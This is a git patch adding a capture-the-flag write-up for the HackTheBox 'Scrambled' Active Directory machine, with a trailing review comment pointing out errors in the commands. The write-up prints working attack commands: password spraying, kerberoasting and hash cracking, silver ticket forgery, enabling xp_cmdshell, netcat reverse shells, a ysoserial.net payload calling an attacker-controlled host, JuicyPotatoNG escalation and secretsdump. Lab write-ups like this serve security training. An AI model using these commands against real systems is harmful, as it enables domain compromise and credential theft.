From d588153cc4b49358f437b5634d0a3c5f184cdb43 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Fri, 7 Oct 2022 10:37:12 +0500 Subject: [PATCH] Create Scrambled.md --- HackTheBox/Scrambled.md | 450 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 450 insertions(+) create mode 100644 HackTheBox/Scrambled.md diff --git a/HackTheBox/Scrambled.md b/HackTheBox/Scrambled.md new file mode 100644 index 0000000..0a981a8 --- /dev/null +++ b/HackTheBox/Scrambled.md 
@@ -0,0 +1,450 @@ +# HackTheBox - Scrambled + +## NMAP + +```bash +PORT STATE SERVICE VERSION +53/tcp open domain? +| fingerprint-strings: +| DNSVersionBindReqTCP: +| version +|_ bind +80/tcp open http Microsoft IIS httpd 10.0 +88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-11 20:31:53Z) +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) +| ssl-cert: Subject: commonName=DC1.scrm.local +| Subject Alternative Name: othername:, DNS:DC1.scrm.local +| Issuer: commonName=scrm-DC1-CA +|_ssl-date: 2022-06-11T20:35:26+00:00; 0s from scanner time. +445/tcp open microsoft-ds? +464/tcp open kpasswd5? +593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) +| ssl-cert: Subject: commonName=DC1.scrm.local +| Subject Alternative Name: othername:, DNS:DC1.scrm.local +| Issuer: commonName=scrm-DC1-CA +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha1WithRSAEncryption +1433/tcp open ms-sql-s Microsoft SQL Server +| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback +| Issuer: commonName=SSL_Self_Signed_Fallback +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2022-06-11T20:31:09 +| Not valid after: 2052-06-11T20:31:09 +| MD5: aa54 162f 4724 50c6 9c3d 396f 9fcd 1baa +|_SHA-1: 7925 3b1a 758b 687d 02f9 137e 0199 9eca 21bf 9264 +|_ssl-date: 2022-06-11T20:35:19+00:00; 0s from scanner time. +4411/tcp open found? 
+| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, R +PCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, oracle-tns: +| SCRAMBLECORP_ORDERS_V1.0.3; +| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: +| SCRAMBLECORP_ORDERS_V1.0.3; +|_ ERROR_UNKNOWN_COMMAND; +5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +9389/tcp open mc-nmf .NET Message Framing +49667/tcp open unknown +49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +49670/tcp open msrpc Microsoft Windows RPC +49688/tcp open unknown +49693/tcp open unknown + +``` + +## PORT 139/455 (SMB) + +Checking for null authentication on smb + + + +## PORT 80 (HTTP) + + + +On the support page we'll see a message about NTLM authentication being disabled on the network means that we can't login with just username and password + + + +There's a page about new user account creation but it wasn't making any request + + + +Another page about contacting to supports reveals a username `ksimpson` + + + +Also there's a page about the sales app troubleshooting + + + + + +This tells that Sales Order application is running on port 4411 + + + +Password reset page tells about password being resetted to same as username so let's try to see if the username we have as a password as ksimpson + +```bash +/opt/kerbrute/kerbrute_linux_amd64 passwordspray users.txt ksimpsond -d scrm.local --dc 10.129.72.45 --user-as-pass + +``` + + + +Since NTLM authentication is disabled we need to do kerberos authentication, we'll need a kerberos ticket for ksimpson for that we can use impacket's `getTGT.py` + +```bash +python3 getTGT.py scrm.local/ksimpson +``` + + + +Now create a variable `KRB5CCNAME` which hold the this ticket + + + +Having the ticket we can try to authenticate on smb with `smbclien` + + + +It didn't work but 
there's an impacket script called `smbclient.py` which we can try to use + + + +And this worked, we can list the available shares wiith `shares` + + + +These shares can be accsssed with `use share_name` but we were only able to access `Public` share + + + +This share only has a pdf file + + + +It talks about the disabling NTLM authentication as we saw from the alert on the site but it also talks about a SQL so maybe there's a service account we can kerberoast + + + +On performing kerberoasting with `GetUserSPNs.py` + + + +But it seems like it isn't working properly, there was an issue with GetUsersSPNs.py when it's used with +kerberos authentication + +https://github.com/SecureAuthCorp/impacket/issues/1206#issuecomment-961395218 + + + +We can fix this by following the changes mentioned by the machine author himself + +For editing the script we need to know the location of this script for that we can use `-debug` arguement which display where impacket library is installed + + + +After making a small change in the script we can get the TGS for `sqlsvc` account + +```bash +GetUserSPNs.py -request -dc-ip DC1.scrm.local scrm.local/ksimpson -k -no-pass -debug +``` + + + +I didn't had this issue but some people were having the issue openssl in impacket when using GetUserSPNs and the fix for this was to change the TLS contenxt method from v1 to v1_2 + + + +https://github.com/SecureAuthCorp/impacket/issues/856 + + +Running hashcat against this hash we can get it cracked + +```bash +hashcat -a 0 -m 13100 ./sqlsvc_hash.txt /opt/SecLists/Passwords/rockyou.txt --force[ +``` + + + + + +We need to grab sqlsvc's TGT as well + + + +Checking if we are able to login to mssql + +> + +Since administrator is able to access this service we need to perform a `Silver Ticket` attack + +https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket + +## Foothold + +We have everything for crafting a silver ticket but we don't have the domain sid and we can't use 
impacket's lookupid.py as it requires only NTLM authentication but we could use `rpcclient` and in order to use rpcclient with kerberos authentication we need to install `kinit` and `krb5-user` + +https://michlstechblog.info/blog/linux-kerberos-authentification-against-windows-active-directory/ + +After having this installed we need to edit `/etc/krb5.conf` which defines the kerberos relam + + + +```bash +[libdefaults] + default_realm = SCRM.LOCAL + +[realms] + SCRM.LOCAL = { + kdc = 10.129.73.76 + } +``` + +Using `klist` we can check if we have the ticket in the variable + + + +And now we can use rpcclient with kerberos authentication + +```bash +rpcclient -U 'scrm.local/ksimpson' dc1.scrm.local -k +``` + + + +We can get the domain sid as well by using the command `lookupsid any_user_name` which well return the sid of the user but ignoring the last 4 digits which identifies the user's sid we can get the domain sid which is `S-1-5-21-2743207045-1827831105-2542523200` + +Now that we have all the pieces, we need to use `ticketer.py` from impacket to make our silver ticket but before going into making a ticket we need the NTLM hash for sqlsvc's password so we can just use python to generate us the NTLM hash + +```python +import hashlib,binascii +hash = hashlib.new('md4', "Pegasus60".encode('utf-16le')).digest(); +print (binascii.hexlify(hash)); +``` + + + +```bash +ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -spn MSSQLSvc/dc1.scrm.local -domain scrm.local -domain-sid S-1-5-21-2743207045-1827831105-2542523200 administrator + +``` + + + +We can now login to mssql using mssqlclient, but `xp_cmdshell` was disabled as this will allow us to run system commands + + + +We can enable this by running `enable_xp_cmdshell` + + + + + +We'll need a reverse shell, we can get it by uploading nc.exe + + + + + +After getting a shell as `sqlsvc` I uploaded `ssharphound.exe` to enumerate AD + + + +Using netcat we can transfer this archive on to our system + + + +Uploading the 
json files from archive to bloodhound + + + +Running shortest path to high targets query didn't showed anything interesting path + + + +## Privilege Escalation (miscsvc) + +Having a look back at the pdf we found it talks about the credentials being retrieved + + + +So going back to mssqclient we can execute quries, let's run a query for getting the database names + +```sql +SELECT name FROM master.dbo.sysdatabases; +``` + + + +Switching to `ScrambleHR` database, we can now list the tables + + +```sql +SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'; +``` + + + +From `UserImport` table we can get credentials for `MiscSvc` + + + +Having the credentials, since NTLM authentication is disabled we can't use winrm to login, so we'll just have to use powershell `Invoke-Command` + +```powershell + +$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force + +$Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword) + + Invoke-Command -Computer 127.0.0.1 -Credential $Cred -ScriptBlock { whoami } +``` + + + +Transferring nc in miscsvc's directory we can get a reverse shell as this user + + + +## Privilege Escalation (NT / Authority ) +We are in IT group so we can now access the IT folder from the share and there's ScrambleClient exe and dll + + + +Transferring the dll with nc on windows machine we can reverse this by using `ILSpy` + + + +On loading the dll we can see the variables having the available commands like `LOGON` , `LIST_ORDERS` , `UPLOAD_ORDERS` and `QUIT` we can also see the `ServerPort` variable which as a value of 4411 that's listening on port 4411 + + + +On using the command LIST_ORDERS, it retuns us some kind of base64 text + +Goging back to ILspy, it's actually serializing the data + + + + + + + +We can exploit this by creating a seriialized payload using `ysoserial` using the proper format and gadget for executing commands + +https://github.com/pwntester/ysoserial.net + +Even 
tho we can use ysoserial on linux with `wine` but I just used it windows as it's an exe + + + + +From the help menu, we can look for gadgets which supports `NetDataContractSerializer` which is a serialization used in .NET applications + +So first let's generate a serialized payload which will make a request to our server just to test if the exploit works + +```powershell +.\ysoserial.exe -f BinaryFormatter -g SessionSecurityToken -o base64 -c "cmd.exe /c curl http://10.10.14.26:2222/" +``` + + + + + +This got a hit on our python server, which means we can run execute commands, so we'll transfer nc and execute it to get a reverse shell + + + + + +And we got a shell as `NT / AUTHORITY`, we can now just change the administrator's password to get the TGT and can use either psexec, wmiexec or smbexec to get a shell, we can even use secretsdump.py to get NTDS.dit + + + + + + + +## psexec + +``` +psexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## wmiexec + +```bash +wmiexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## smbexec + +```bash +smbexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## secretsdump + +Get those hashes + +```bash +secretsdump.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + + + +## Un-Intended + +The un-intended way for this box was exploting `SeImpersonatePrivilege` which `sqlsvc` user had, the box was blooded by exploiting that privilege through the exploits Juicy and Rouge potato but it was soon patched as port 445 was closed or wasn't responding when trying this exploit. 
Sometime later Opcode shared a tweet related to a new technique being implemented in JuicyPotato + +![](https://i.imgur.com/YcDmyB4.png) + +We can just download the exe from github + +https://github.com/antonioCoco/JuicyPotatoNG + +To verify that we have the impersonate privilege + +![](https://i.imgur.com/t1IOU9h.png) + +Now running the exploit + +``` +JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c whoami > C:\Users\sqlsvc\file.txt" +``` +![](https://i.imgur.com/CxE5mxC.png) + +Reading the file in which we saved the output of `whomai` + +![](https://i.imgur.com/Ns0dipU.png) + +We can get the shell just by running nc again + +![](https://i.imgur.com/ctamevs.png) + +## References + +- https://github.com/SecureAuthCorp/impacket/issues/1206#issuecomment-961395218 +- https://www.vgemba.net/microsoft/Kerberos-Linux-Windows-AD/ +- https://michlstechblog.info/blog/linux-kerberos-authentification-against-windows-active-directory/ +- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket +- https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/ +- https://github.com/pwntester/ysoserial.net +- https://github.com/antonioCoco/JuicyPotatoNG +- https://twitter.com/splinter_code/status/1572636045086429190?t=75YAkjzDq3TBw2HLBRYUJw&s=33
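Review bot: The ysoserial section is internally inconsistent: the prose says to pick a gadget that supports `NetDataContractSerializer`, but the command that follows uses `-f BinaryFormatter`; either the text or the `-f` value should be corrected so the reader knows which formatter the ScrambleClient dll actually uses. A few copy-paste blockers also need fixing in the commands: the kerbrute line passes `ksimpsond` where the text means `ksimpson` (with `--user-as-pass` the positional password is ignored anyway, which is worth saying), the hashcat line ends in a stray `[` after `--force`, and the `hashlib.new('md4', ...)` NTLM snippet fails on OpenSSL 3 builds of Python unless the legacy provider is enabled, so a note pointing at that or at impacket's `ticketer.py` accepting `-nthash` from another source would help. Minor documentation points: the heading `## PORT 139/455 (SMB)` should read `139/445`; the psexec and JuicyPotatoNG fences lack the `bash` tag the other fences use; the krb5.conf `kdc = 10.129.73.76` differs from the `--dc 10.129.72.45` used earlier, so either normalise the DC address or state that the box IP changed between sessions; and the final shell is `NT AUTHORITY\SYSTEM`, not `NT / AUTHORITY` as written in both the heading and the body. Many paragraphs end in blank lines where screenshots presumably sat, so the image links should be restored or the surrounding sentences reworded to stand without them.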